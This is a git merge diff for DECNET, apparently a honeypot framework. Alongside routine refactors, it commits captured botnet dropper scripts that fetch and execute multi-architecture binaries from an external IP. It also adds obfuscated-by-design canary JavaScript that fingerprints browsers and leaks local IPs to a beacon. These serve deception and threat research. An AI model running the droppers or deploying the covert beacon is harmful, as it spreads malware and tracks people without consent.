Merge branch 'merge-rehearsal' into dev

# Conflicts:
#	decnet/templates/postgres/server.py
#	decnet/templates/rdp/Dockerfile
#	decnet/templates/redis/Dockerfile
#	decnet/templates/smtp/Dockerfile
#	decnet/templates/smtp/entrypoint.sh
#	decnet/templates/snmp/Dockerfile
#	decnet/templates/snmp/entrypoint.sh
#	decnet/templates/tftp/Dockerfile
#	decnet/templates/tftp/entrypoint.sh
#	decnet/templates/vnc/Dockerfile
#	decnet/templates/vnc/entrypoint.sh
#	templates/rdp/Dockerfile
#	templates/smb/Dockerfile
#	templates/smtp/Dockerfile
#	templates/smtp/entrypoint.sh
#	templates/snmp/Dockerfile
#	templates/snmp/entrypoint.sh
#	templates/tftp/Dockerfile
#	templates/tftp/entrypoint.sh
#	templates/vnc/Dockerfile
#	tests/services/test_smtp_relay.py
This commit is contained in:
2026-05-01 02:27:20 -04:00
299 changed files with 13964 additions and 1487 deletions

6
.gitignore vendored
View File

@@ -51,3 +51,9 @@ schem
# pydeps-style dependency graph dumps from local analysis runs.
deps.txt
# Node modules vendored under decnet/canary/ for the obfuscator helper.
# The package.json is the source of truth; modules are reinstalled at
# build/deploy time.
node_modules/
package-lock.json

View File

@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
| Slug | Services | OS Fingerprint | Description |
|---|---|---|---|
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
```ini
[deaddeck-1]
amount=1
archetype=deaddeck
ssh.password=admin
[decky-webmail.http]
server_header = Apache/2.4.54 (Debian)
fake_app = wordpress

3
artifacts/curl.sh Normal file
View File

@@ -0,0 +1,3 @@
[0] Downloading 'http://31.56.209.39/curl.sh' ...
Saving 'curl.sh.1'
HTTP response 200 OK [http://31.56.209.39/curl.sh]

46
artifacts/curl.sh.1 Normal file
View File

@@ -0,0 +1,46 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

3
artifacts/evil.sh Normal file
View File

@@ -0,0 +1,3 @@
wget http://31.56.209.39/wget.sh -o wget.sh
wget http://31.56.209.39/curl.sh -o curl.sh

3
artifacts/wget.sh Normal file
View File

@@ -0,0 +1,3 @@
[0] Downloading 'http://31.56.209.39/wget.sh' ...
Saving 'wget.sh.1'
HTTP response 200 OK [http://31.56.209.39/wget.sh]

46
artifacts/wget.sh.1 Normal file
View File

@@ -0,0 +1,46 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

BIN
decnet.tar Normal file

Binary file not shown.

View File

@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
return str(tid)
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
"""Verify hash integrity and structural validity; return topology_id."""
local_hash = canonical_hash(hydrated)
if local_hash != version_hash:
raise HashMismatch(
f"master hash {version_hash!r} does not match agent hash "
f"{local_hash!r} — refusing to apply"
)
issues = _validate_topology(hydrated)
if _validation_errors(issues):
raise ValidationError(issues)
return _topology_id(hydrated)
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
"""Tear down the current topology if it differs from topology_id.
Master is authoritative — a different pinned topology (fully applied,
partially applied, or drifted) is torn down before the new apply proceeds.
Refusing with 409 would leave the agent stuck in a state only a human
could resolve.
"""
existing = store.current()
if existing is None or existing.topology_id == topology_id:
return
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked by a
# half-torn-down predecessor. Leftover docker objects surface via
# the next heartbeat's observed block.
store.clear(existing.topology_id)
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
"""Create bridge networks, write compose file, and bring up containers.
Sync/blocking — callers must dispatch via asyncio.to_thread.
``--always-recreate-deps`` keeps service containers' netns shares
fresh: every decky service joins its base's netns via
``network_mode: container:<base>``, and that share is bound at
service start time. If a base is recreated (e.g. when ``ports:``
changes after toggling ``forwards_l3``) but compose decides the
services are unchanged, the services keep a stale netns FD
pointing at the destroyed base — they end up in an empty
namespace with only ``lo``, and external traffic hits a closed
port on the live base. Forcing dependents to recreate alongside
the base is the cheapest way to make this race impossible.
"""
compose_path = _topology_compose_path(topology_id)
client = docker.from_env()
for lan in hydrated["lans"]:
net_name = _topology_network_name(topology_id, lan["name"])
create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
write_topology_compose(hydrated, compose_path)
_compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
async def apply(
hydrated: dict[str, Any],
version_hash: str,
@@ -73,76 +140,11 @@ async def apply(
Any docker / compose error propagates up; the endpoint maps it
to 500 and records the message on the store row.
"""
local_hash = canonical_hash(hydrated)
if local_hash != version_hash:
raise HashMismatch(
f"master hash {version_hash!r} does not match agent hash "
f"{local_hash!r} — refusing to apply"
)
issues = _validate_topology(hydrated)
if _validation_errors(issues):
raise ValidationError(issues)
topology_id = _topology_id(hydrated)
# Master is authoritative. If a different topology is pinned here
# — whether it fully applied, only partially applied (failure
# marker row + orphan containers), or drifted — teardown first,
# then accept the new one. Refusing with 409 would leave the
# agent stuck in a state only a human could resolve.
existing = store.current()
if existing is not None and existing.topology_id != topology_id:
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked
# by a half-torn-down predecessor. Leftover docker objects
# will surface via the next heartbeat's observed block.
store.clear(existing.topology_id)
lans = hydrated["lans"]
compose_path = _topology_compose_path(topology_id)
client = docker.from_env()
# Bridges + compose are sync/blocking; hop to a thread so we don't
# stall the event loop on a slow docker daemon.
def _materialise() -> None:
for lan in lans:
net_name = _topology_network_name(topology_id, lan["name"])
internal = not lan["is_dmz"]
create_bridge_network(
client, net_name, lan["subnet"], internal=internal
)
write_topology_compose(hydrated, compose_path)
# ``--always-recreate-deps`` keeps service containers' netns shares
# fresh: every decky service joins its base's netns via
# ``network_mode: container:<base>``, and that share is bound at
# service start time. If a base is recreated (e.g. when ``ports:``
# changes after toggling ``forwards_l3``) but compose decides the
# services are unchanged, the services keep a stale netns FD
# pointing at the destroyed base — they end up in an empty
# namespace with only ``lo``, and external traffic hits a closed
# port on the live base. Forcing dependents to recreate alongside
# the base is the cheapest way to make this race impossible.
_compose_with_retry(
"up", "--build", "-d", "--always-recreate-deps",
compose_file=compose_path,
)
await asyncio.to_thread(_materialise)
topology_id = _check_hash_and_validate(hydrated, version_hash)
await _teardown_superseded(topology_id, store)
await asyncio.to_thread(_materialise, hydrated, topology_id)
store.put(topology_id, version_hash, hydrated)
log.info(
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
)
log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
async def teardown(

View File

@@ -63,6 +63,7 @@ class TopologyStore:
# The agent is single-process, so there's no real contention —
# sqlite's own connection lock is enough.
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
self._conn.row_factory = sqlite3.Row
self._conn.execute(
"CREATE TABLE IF NOT EXISTS applied_topology ("
" topology_id TEXT PRIMARY KEY,"
@@ -84,11 +85,11 @@ class TopologyStore:
if row is None:
return None
return AppliedRow(
topology_id=row[0],
applied_version_hash=row[1],
hydrated=json.loads(row[2]),
applied_at=int(row[3]),
last_error=row[4],
topology_id=row["topology_id"],
applied_version_hash=row["applied_version_hash"],
hydrated=json.loads(row["hydrated_blob_json"]),
applied_at=int(row["applied_at"]),
last_error=row["last_error"],
)
# ---------------------------------------------------------------- writes

View File

@@ -13,7 +13,7 @@ from typing import Sequence
from decnet.asn.base import Provider
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
from decnet.asn.iptoasn.parse import parse_file
from decnet.asn.lookup import AsnLookup
from decnet.asn.lookup import AsnLookup, Range
from decnet.asn.paths import ensure_root
logger = logging.getLogger("decnet.asn.iptoasn.provider")
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
"asn.iptoasn: cache load failed, rebuilding: %s", exc
)
ranges = []
ranges: list[Range] = []
for path in self.data_paths():
if not path.exists():
continue

View File

@@ -54,6 +54,7 @@ SYSTEM = "system"
CREDENTIAL = "credential"
ORCHESTRATOR = "orchestrator"
CANARY = "canary"
SMTP = "smtp"
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
@@ -83,6 +84,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
# syslog sidechannel too) to interleave substrate-change markers into
# attacker traversals.
DECKY_MUTATION = "mutation"
# Per-service add/remove on a deployed decky (live; no full redeploy).
# Payload carries ``decky_name``, ``service_name``, optional
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
# that watch substrate shape (correlator, dashboard, profiler) reconcile
# off these without waiting for the next decnet-state.json snapshot.
DECKY_SERVICE_ADDED = "service_added"
DECKY_SERVICE_REMOVED = "service_removed"
# Per-service config change (the schema-driven Inspector form). Payload
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
# ``service_config`` (the new validated dict), and ``recreated`` — true
# when the operator hit Apply (container was force-recreated to pick up
# the new env), false when they only hit Save (DB-only).
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
# Attacker event types (second token under the ``attacker`` root). First
# sighting, session boundary transitions, and score-threshold crossings
@@ -381,6 +395,16 @@ def system_control(worker: str) -> str:
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
def smtp(event_type: str) -> str:
"""Build ``smtp.<event_type>``.
*event_type* may contain dots (e.g. ``probe.pending``).
"""
if not event_type:
raise ValueError("smtp topic requires a non-empty event_type")
return f"{SMTP}.{event_type}"
def _reject_tokens(*parts: str) -> None:
"""Reject topic segments that would break NATS-style tokenization.

View File

@@ -0,0 +1,18 @@
// Node helper invoked by decnet.canary.obfuscator.
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
// Kept dependency-light on purpose: only javascript-obfuscator.
const JsObf = require('javascript-obfuscator');
let raw = '';
process.stdin.setEncoding('utf8');
process.stdin.on('data', (chunk) => { raw += chunk; });
process.stdin.on('end', () => {
try {
const { code, options } = JSON.parse(raw);
const result = JsObf.obfuscate(code, options || {});
process.stdout.write(result.getObfuscatedCode());
} catch (e) {
process.stderr.write(String(e && e.stack || e));
process.exit(2);
}
});

View File

@@ -100,6 +100,12 @@ class CanaryArtifact:
planting. Never leaked to the attacker-facing surface.
"""
fingerprint_nonce: Optional[str] = None
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
so the worker can validate incoming ``?k=`` params.
"""
class CanaryGenerator(ABC):
"""Produces a fake artifact from scratch."""

View File

@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
}
@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
"honeydoc_pdf": "http",
"ssh_key": "dns", # trip is DNS resolution of host comment
"mysql_dump": "dns", # trip is DNS resolution of subdomain
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
"fingerprint_svg": "http", # same, embedded inside SVG <script>
}
@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
}
@@ -156,7 +162,7 @@ async def cultivate(
# attribute a callback if the artifact trips during the plant
# itself (improbable but possible — DOCX viewers can preview
# autoplay-style).
await repo.create_canary_token({
token_data: dict = {
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
"decky_name": plan.decky_name,
"instrumenter": None,
@@ -167,7 +173,10 @@ async def cultivate(
"placed_at": datetime.now(timezone.utc),
"created_by": created_by,
"state": "planted",
})
}
if artifact.fingerprint_nonce is not None:
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
await repo.create_canary_token(token_data)
# Carry the placement_path on the artifact so the orchestrator's
# plant_file call uses it. We don't mutate the generator's

View File

@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
"honeydoc_docx",
"honeydoc_pdf",
"mysql_dump",
"fingerprint_html",
"fingerprint_svg",
)
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
if name == "mysql_dump":
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
return MySQLDumpGenerator()
if name == "fingerprint_html":
from decnet.canary.generators.fingerprint_html import (
FingerprintHtmlGenerator,
)
return FingerprintHtmlGenerator()
if name == "fingerprint_svg":
from decnet.canary.generators.fingerprint_svg import (
FingerprintSvgGenerator,
)
return FingerprintSvgGenerator()
raise ValueError(
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
)

View File

@@ -0,0 +1,291 @@
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
// canary, harvests browser primitives, and beacons the result back to the
// canary worker. Ported from canary-self-test.html with the rendering UI
// stripped out.
//
// Three placeholders are substituted by the Python builder BEFORE
// javascript-obfuscator runs:
//
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
//
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
// then a fingerprint payload sent as a base64-URL query param on a second
// GET so the existing worker records the hit even before step-4 POST
// support lands. Both fail-open: any error short-circuits to next step.
(async function () {
var BEACON_URL = "{{BEACON_URL}}";
var MINT_UUID = "{{MINT_UUID}}";
var MINT_NONCE = "{{MINT_NONCE}}";
var fp = { mint: MINT_UUID };
function fire(url) {
try {
var img = new Image();
img.src = url;
} catch (e) { /* swallow */ }
}
// 1) bare-open beacon — fires regardless of whether the rest succeeds
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
function sha256(str) {
var buf = new TextEncoder().encode(str);
return crypto.subtle.digest("SHA-256", buf).then(function (h) {
return Array.from(new Uint8Array(h))
.map(function (b) { return b.toString(16).padStart(2, "0"); })
.join("");
});
}
// navigator
try {
fp.nav = {
ua: navigator.userAgent,
pl: navigator.platform,
lg: navigator.language,
lgs: (navigator.languages || []).join(","),
ck: navigator.cookieEnabled,
dnt: navigator.doNotTrack,
hc: navigator.hardwareConcurrency,
dm: navigator.deviceMemory || null,
tp: navigator.maxTouchPoints,
wd: navigator.webdriver === true,
pdf: navigator.pdfViewerEnabled || null,
};
} catch (e) { fp.nav = { err: String(e) }; }
// screen
try {
fp.scr = {
w: screen.width, h: screen.height,
aw: screen.availWidth, ah: screen.availHeight,
cd: screen.colorDepth, pd: screen.pixelDepth,
dpr: window.devicePixelRatio,
iw: window.innerWidth, ih: window.innerHeight,
or: (screen.orientation && screen.orientation.type) || null,
};
} catch (e) { fp.scr = { err: String(e) }; }
// tz / locale
try {
var dtf = Intl.DateTimeFormat().resolvedOptions();
fp.tz = {
z: dtf.timeZone, lc: dtf.locale,
ca: dtf.calendar, ns: dtf.numberingSystem,
off: new Date().getTimezoneOffset(),
};
} catch (e) { fp.tz = { err: String(e) }; }
// connection
try {
var c = navigator.connection;
fp.cn = c ? {
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
} : null;
} catch (e) { fp.cn = { err: String(e) }; }
// canvas
try {
var cv = document.createElement("canvas");
cv.width = 280; cv.height = 60;
var ctx = cv.getContext("2d");
ctx.textBaseline = "top";
ctx.font = "14px Arial";
ctx.fillStyle = "#f60";
ctx.fillRect(125, 1, 62, 20);
ctx.fillStyle = "#069";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
ctx.fillStyle = "rgba(102,204,0,0.7)";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
var dataURL = cv.toDataURL();
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
} catch (e) { fp.cv = { err: String(e) }; }
// webgl
try {
var gc = document.createElement("canvas");
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
if (gl) {
var ext = gl.getExtension("WEBGL_debug_renderer_info");
fp.gl = {
v: gl.getParameter(gl.VENDOR),
r: gl.getParameter(gl.RENDERER),
ver: gl.getParameter(gl.VERSION),
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
};
} else { fp.gl = { err: "unavailable" }; }
} catch (e) { fp.gl = { err: String(e) }; }
// audio
try {
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
if (ACtx) {
var actx = new ACtx(1, 44100, 44100);
var osc = actx.createOscillator();
var cmp = actx.createDynamicsCompressor();
osc.type = "triangle"; osc.frequency.value = 10000;
cmp.threshold.value = -50; cmp.knee.value = 40;
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
osc.connect(cmp); cmp.connect(actx.destination);
osc.start(0);
var buf = await actx.startRendering();
var data = buf.getChannelData(0).slice(4500, 5000);
var sum = 0;
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
} else { fp.au = { err: "unavailable" }; }
} catch (e) { fp.au = { err: String(e) }; }
// fonts
try {
var bases = ["monospace", "sans-serif", "serif"];
var tests = [
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
"San Francisco", "Helvetica Neue", "Lucida Grande",
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
"Noto Sans", "Noto Mono",
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
"Malgun Gothic", "Noto Sans CJK",
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
"Bahnschrift", "Cyberpunk",
];
var sp = document.createElement("span");
sp.style.fontSize = "72px";
sp.style.position = "absolute";
sp.style.left = "-9999px";
sp.innerHTML = "mmmmmmmmmmlli";
document.body.appendChild(sp);
var bs = {};
for (var bi = 0; bi < bases.length; bi++) {
sp.style.fontFamily = bases[bi];
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
}
var det = [];
for (var ti = 0; ti < tests.length; ti++) {
for (var bj = 0; bj < bases.length; bj++) {
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
if (sp.offsetWidth !== bs[bases[bj]].w ||
sp.offsetHeight !== bs[bases[bj]].h) {
det.push(tests[ti]); break;
}
}
}
document.body.removeChild(sp);
fp.ft = {
h: await sha256(det.slice().sort().join(",")),
n: det.length, t: tests.length, d: det,
};
} catch (e) { fp.ft = { err: String(e) }; }
// webrtc local ip leak
try {
var ips = {}; var cands = [];
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
window.mozRTCPeerConnection;
if (RPC) {
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
pc.createDataChannel("");
pc.onicecandidate = function (e) {
if (!e.candidate) return;
cands.push(e.candidate.candidate);
var m = e.candidate.candidate.match(
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
if (m) ips[m[1]] = 1;
};
var off = await pc.createOffer();
await pc.setLocalDescription(off);
await new Promise(function (r) { setTimeout(r, 1500); });
pc.close();
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
} else { fp.rtc = { err: "unavailable" }; }
} catch (e) { fp.rtc = { err: String(e) }; }
// battery
try {
if (navigator.getBattery) {
var bat = await navigator.getBattery();
fp.bt = {
c: bat.charging, l: bat.level,
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
};
} else { fp.bt = { err: "unavailable" }; }
} catch (e) { fp.bt = { err: String(e) }; }
// perf timing jitter
try {
var samples = [];
for (var pi = 0; pi < 1000; pi++) {
var pa = performance.now();
var x = 0;
